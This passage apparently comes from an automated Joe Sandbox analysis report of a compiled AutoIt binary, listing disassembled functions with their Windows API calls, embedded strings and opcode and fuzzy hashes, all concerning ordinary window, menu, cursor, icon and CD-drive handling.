                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                    • String ID: @$ThumbnailClass
                    • API String ID: 1788623398-1539354611
                    • Opcode ID: 020363660ca7d71f34756f1623f4acd369a1d6cd1f29e6ae8ac33c2e96e31edf
                    • Instruction ID: 2113ca19c953e4d0fb0a3bed3b629d6a09082ecb25fab152276a3acc7fd757eb
                    • Opcode Fuzzy Hash: 020363660ca7d71f34756f1623f4acd369a1d6cd1f29e6ae8ac33c2e96e31edf
                    • Instruction Fuzzy Hash: BD81CF711082059BDB00DF11C881BAB77E8EF4075AF14856FFD859A192DB38DD4DCBAA
                    Function 0048C5FE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                    • DragQueryPoint.SHELL32(?,?), ref: 0048C627
                      • Part of subcall function 0048AB37: ClientToScreen.USER32(?,?), ref: 0048AB60
                      • Part of subcall function 0048AB37: GetWindowRect.USER32(?,?), ref: 0048ABD6
                      • Part of subcall function 0048AB37: PtInRect.USER32(?,?,0048C014), ref: 0048ABE6
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0048C690
                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0048C69B
                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0048C6BE
                    • _wcscat.LIBCMT ref: 0048C6EE
                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0048C705
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0048C71E
                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0048C735
                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0048C757
                    • DragFinish.SHELL32(?), ref: 0048C75E
                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0048C851
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pbL
                    • API String ID: 169749273-3863044002
                    • Opcode ID: ff19a083962564101d0b0bee14167f2d37b8cd78877080f1dcf00369c6d7ebf7
                    • Instruction ID: 4fadb8ae9d86136d60326728fb0320be203031e120dd753c2ba31efb77555f42
                    • Opcode Fuzzy Hash: ff19a083962564101d0b0bee14167f2d37b8cd78877080f1dcf00369c6d7ebf7
                    • Instruction Fuzzy Hash: 1B617F71108300AFC701EF65CC85D9FBBE8EF88714F50092EF591A22A1DB74A949CB6A
                    Function 0045ABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: __wcsnicmp
                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                    • API String ID: 1038674560-1810252412
                    • Opcode ID: a4b87119f2590ef0ff3b3c98b7eb3c6a6e3570d121fdce2df4e859d34895fad6
                    • Instruction ID: cc55e2bc6580523fe6938d14c256d65c14dee3a36fa7a852f9c3cef8ae364549
                    • Opcode Fuzzy Hash: a4b87119f2590ef0ff3b3c98b7eb3c6a6e3570d121fdce2df4e859d34895fad6
                    • Instruction Fuzzy Hash: 2C31A370A48209AADB01EA61DE43FEE7774AF14719F60052FB801711D2EB6D6F18C56E
                    Function 00474FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON
                    Download Yara Rule
                    APIs
                    • LoadCursorW.USER32(00000000,00007F8A), ref: 00475013
                    • LoadCursorW.USER32(00000000,00007F00), ref: 0047501E
                    • LoadCursorW.USER32(00000000,00007F03), ref: 00475029
                    • LoadCursorW.USER32(00000000,00007F8B), ref: 00475034
                    • LoadCursorW.USER32(00000000,00007F01), ref: 0047503F
                    • LoadCursorW.USER32(00000000,00007F81), ref: 0047504A
                    • LoadCursorW.USER32(00000000,00007F88), ref: 00475055
                    • LoadCursorW.USER32(00000000,00007F80), ref: 00475060
                    • LoadCursorW.USER32(00000000,00007F86), ref: 0047506B
                    • LoadCursorW.USER32(00000000,00007F83), ref: 00475076
                    • LoadCursorW.USER32(00000000,00007F85), ref: 00475081
                    • LoadCursorW.USER32(00000000,00007F82), ref: 0047508C
                    • LoadCursorW.USER32(00000000,00007F84), ref: 00475097
                    • LoadCursorW.USER32(00000000,00007F04), ref: 004750A2
                    • LoadCursorW.USER32(00000000,00007F02), ref: 004750AD
                    • LoadCursorW.USER32(00000000,00007F89), ref: 004750B8
                    • GetCursorInfo.USER32(?), ref: 004750C8
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Cursor$Load$Info
                    • String ID:
                    • API String ID: 2577412497-0
                    • Opcode ID: fe88967af424c1f4c9ae994d1dca842c12f2ee5cef9159fe2d10a3b622c76547
                    • Instruction ID: d5c7a2001707235dd9e126089dd3671015cbda4ea0a9ffae781a460d29ca5a6d
                    • Opcode Fuzzy Hash: fe88967af424c1f4c9ae994d1dca842c12f2ee5cef9159fe2d10a3b622c76547
                    • Instruction Fuzzy Hash: 7F3114B1D083196ADF109FB68C8999FBFE8FF04750F50453BA50DEB281DA7865048F95
                    Function 0048A1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 0048A259
                    • DestroyWindow.USER32(?,?), ref: 0048A2D3
                      • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0048A34D
                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0048A36F
                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0048A382
                    • DestroyWindow.USER32(00000000), ref: 0048A3A4
                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0048A3DB
                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0048A3F4
                    • GetDesktopWindow.USER32 ref: 0048A40D
                    • GetWindowRect.USER32(00000000), ref: 0048A414
                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0048A42C
                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0048A444
                      • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                    • String ID: 0$tooltips_class32
                    • API String ID: 1297703922-3619404913
                    • Opcode ID: ad7f984ea1cd4845daa69472354c2a8f15b860bce95c98789d10b07fca09f9c0
                    • Instruction ID: 021702ee8d535e162beb7c83f4b22bae82635ac61efe1e234d944cc96a30802f
                    • Opcode Fuzzy Hash: ad7f984ea1cd4845daa69472354c2a8f15b860bce95c98789d10b07fca09f9c0
                    • Instruction Fuzzy Hash: CE719270141204AFE721DF18CC49F6B77E5FB88704F04492EF985972A0D7B8E956CB6A
                    Function 00484392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                    Download Yara Rule
                    APIs
                    • CharUpperBuffW.USER32(?,?), ref: 00484424
                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0048446F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: BuffCharMessageSendUpper
                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                    • API String ID: 3974292440-4258414348
                    • Opcode ID: d41169d53101f6065c28c3bc0dfba1111c846f283bff3c510c83ccf8dd002daa
                    • Instruction ID: 284482c989e2c3ea33895925bad2fd62e2b6eb619b8524f2c72ddc2562c3458e
                    • Opcode Fuzzy Hash: d41169d53101f6065c28c3bc0dfba1111c846f283bff3c510c83ccf8dd002daa
                    • Instruction Fuzzy Hash: BF917F712043119BCB04FF11C451A6EB7E1AF95358F44886EF8966B3A3DB38ED0ACB59
                    Function 0048B7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                    Download Yara Rule
                    APIs
                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0048B8B4
                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,004891C2), ref: 0048B910
                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0048B949
                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0048B98C
                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0048B9C3
                    • FreeLibrary.KERNEL32(?), ref: 0048B9CF
                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0048B9DF
                    • DestroyIcon.USER32(?,?,?,?,?,004891C2), ref: 0048B9EE
                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0048BA0B
                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0048BA17
                      • Part of subcall function 00422EFD: __wcsicmp_l.LIBCMT ref: 00422F86
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                    • String ID: .dll$.exe$.icl
                    • API String ID: 1212759294-1154884017
                    • Opcode ID: 2fc131844969b4b5c283f9404ec8a9d49153947123385b136b1911b68efed916
                    • Instruction ID: 50163288b7a3e5e0cbad55d9f7afdff750af503695f4b02481751edd59ee4b0a
                    • Opcode Fuzzy Hash: 2fc131844969b4b5c283f9404ec8a9d49153947123385b136b1911b68efed916
                    • Instruction Fuzzy Hash: CC61F2B1900215BEEB14EF65DC41FBF7BA8FB08710F10491AF915D62C1DBB8A984DBA4
                    Function 0046A352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                      • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                    • CharLowerBuffW.USER32(?,?), ref: 0046A3CB
                    • GetDriveTypeW.KERNEL32 ref: 0046A418
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A460
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A497
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A4C5
                      • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                    • API String ID: 2698844021-4113822522
                    • Opcode ID: 437170107335614e440451c14e1bb7fb1cb2a37dfa70594022b46967140f2eef
                    • Instruction ID: 3713139b98a23bb0435d921a878e050fdb512fde8566727adc807e41ed5eba46
                    • Opcode Fuzzy Hash: 437170107335614e440451c14e1bb7fb1cb2a37dfa70594022b46967140f2eef
                    • Instruction Fuzzy Hash: F7515EB15146049FC700EF11C88196BB7E8EF94718F10886EF89967292DB39ED0ACF5A
                    Function 0048C1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0048C1FC
                    • GetFocus.USER32 ref: 0048C20C
                    • GetDlgCtrlID.USER32(00000000), ref: 0048C217
                    • _memset.LIBCMT ref: 0048C342
                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0048C36D
                    • GetMenuItemCount.USER32(?), ref: 0048C38D
                    • GetMenuItemID.USER32(?,00000000), ref: 0048C3A0
                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0048C3D4
                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0048C41C
                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0048C454
                    • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0048C489
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                    • String ID: 0
                    • API String ID: 1296962147-4108050209
                    • Opcode ID: 901300d993ba4ef79483208aca69c4f68d103eaf980791bed4d4ab6720b8591f
                    • Instruction ID: c475bcefc4ba02209658d373736a3052ec3262963195f5d7aee57ef1aaf8ece4
                    • Opcode Fuzzy Hash: 901300d993ba4ef79483208aca69c4f68d103eaf980791bed4d4ab6720b8591f
                    • Instruction Fuzzy Hash: 17818870608301AFD710EF24D894A7FBBE8EB88714F004D2EF99597291D778D945CBAA
                    Function 0047731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetDC.USER32(00000000), ref: 0047738F
                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0047739B
                    • CreateCompatibleDC.GDI32(?), ref: 004773A7
                    • SelectObject.GDI32(00000000,?), ref: 004773B4
                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00477408
                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00477444
                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00477468
                    • SelectObject.GDI32(00000006,?), ref: 00477470
                    • DeleteObject.GDI32(?), ref: 00477479
                    • DeleteDC.GDI32(00000006), ref: 00477480
                    • ReleaseDC.USER32(00000000,?), ref: 0047748B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                    • String ID: (
                    • API String ID: 2598888154-3887548279
                    • Opcode ID: 9b840f603ca055cf69c59b17ce240dfc30cb433146a2e1f05c36ea0610a5c8fc
                    • Instruction ID: dfe8a3419fea5eebfe22a8fe4a62b6ec684acb784746aa6277c3acce6f7982dd
                    • Opcode Fuzzy Hash: 9b840f603ca055cf69c59b17ce240dfc30cb433146a2e1f05c36ea0610a5c8fc
                    • Instruction Fuzzy Hash: 5D515871904209EFCB14CFA8CC84EAFBBB9EF49310F14852EF959A7211D735A945CB54
                    Function 00406A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00420957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00406B0C,?,00008000), ref: 00420973
                      • Part of subcall function 00404750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00404743,?,?,004037AE,?), ref: 00404770
                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00406BAD
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00406CFA
                      • Part of subcall function 0040586D: _wcscpy.LIBCMT ref: 004058A5
                      • Part of subcall function 0042363D: _iswctype.LIBCMT ref: 00423645
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                    • API String ID: 537147316-1018226102
                    • Opcode ID: 7e8133b54eda1aed7a4270345f082cd699d1112609d47d64313adbce1b1bcd58
                    • Instruction ID: 136c1bde332718f4234bbb9892b60201bfb37e26dd96c6a9a3310cb901d73b7e
                    • Opcode Fuzzy Hash: 7e8133b54eda1aed7a4270345f082cd699d1112609d47d64313adbce1b1bcd58
                    • Instruction Fuzzy Hash: 2C027D701083419FC714EF25C8419AFBBE5EF98318F54492FF486A72A2DB38D949CB5A
                    Function 00462D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00462D50
                    • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00462DDD
                    • GetMenuItemCount.USER32(004C5890), ref: 00462E66
                    • DeleteMenu.USER32(004C5890,00000005,00000000,000000F5,?,?), ref: 00462EF6
                    • DeleteMenu.USER32(004C5890,00000004,00000000), ref: 00462EFE
                    • DeleteMenu.USER32(004C5890,00000006,00000000), ref: 00462F06
                    • DeleteMenu.USER32(004C5890,00000003,00000000), ref: 00462F0E
                    • GetMenuItemCount.USER32(004C5890), ref: 00462F16
                    • SetMenuItemInfoW.USER32(004C5890,00000004,00000000,00000030), ref: 00462F4C
                    • GetCursorPos.USER32(?), ref: 00462F56
                    • SetForegroundWindow.USER32(00000000), ref: 00462F5F
                    • TrackPopupMenuEx.USER32(004C5890,00000000,?,00000000,00000000,00000000), ref: 00462F72
                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00462F7E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                    • String ID:
                    • API String ID: 3993528054-0
                    • Opcode ID: 68d6ff921564c39c8709aecc737d134abe6a2587159ab4d14f70d8f79111516a
                    • Instruction ID: dec7b0e441c84a99d0ab23afc077d39fee676e6f9a2472c44709d087c22ecc3a
                    • Opcode Fuzzy Hash: 68d6ff921564c39c8709aecc737d134abe6a2587159ab4d14f70d8f79111516a
                    • Instruction Fuzzy Hash: AB71F670601A05BBEB219F54DD49FAABF64FF04314F10022BF615AA2E1D7FA5C10DB5A
                    Function 004788AB Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON
                    Download Yara Rule
                    APIs
                    • VariantInit.OLEAUT32(?), ref: 004788D7
                    • CoInitialize.OLE32(00000000), ref: 00478904
                    • CoUninitialize.OLE32 ref: 0047890E
                    • GetRunningObjectTable.OLE32(00000000,?), ref: 00478A0E
                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 00478B3B
                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00492C0C), ref: 00478B6F
                    • CoGetObject.OLE32(?,00000000,00492C0C,?), ref: 00478B92
                    • SetErrorMode.KERNEL32(00000000), ref: 00478BA5
                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00478C25
                    • VariantClear.OLEAUT32(?), ref: 00478C35
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
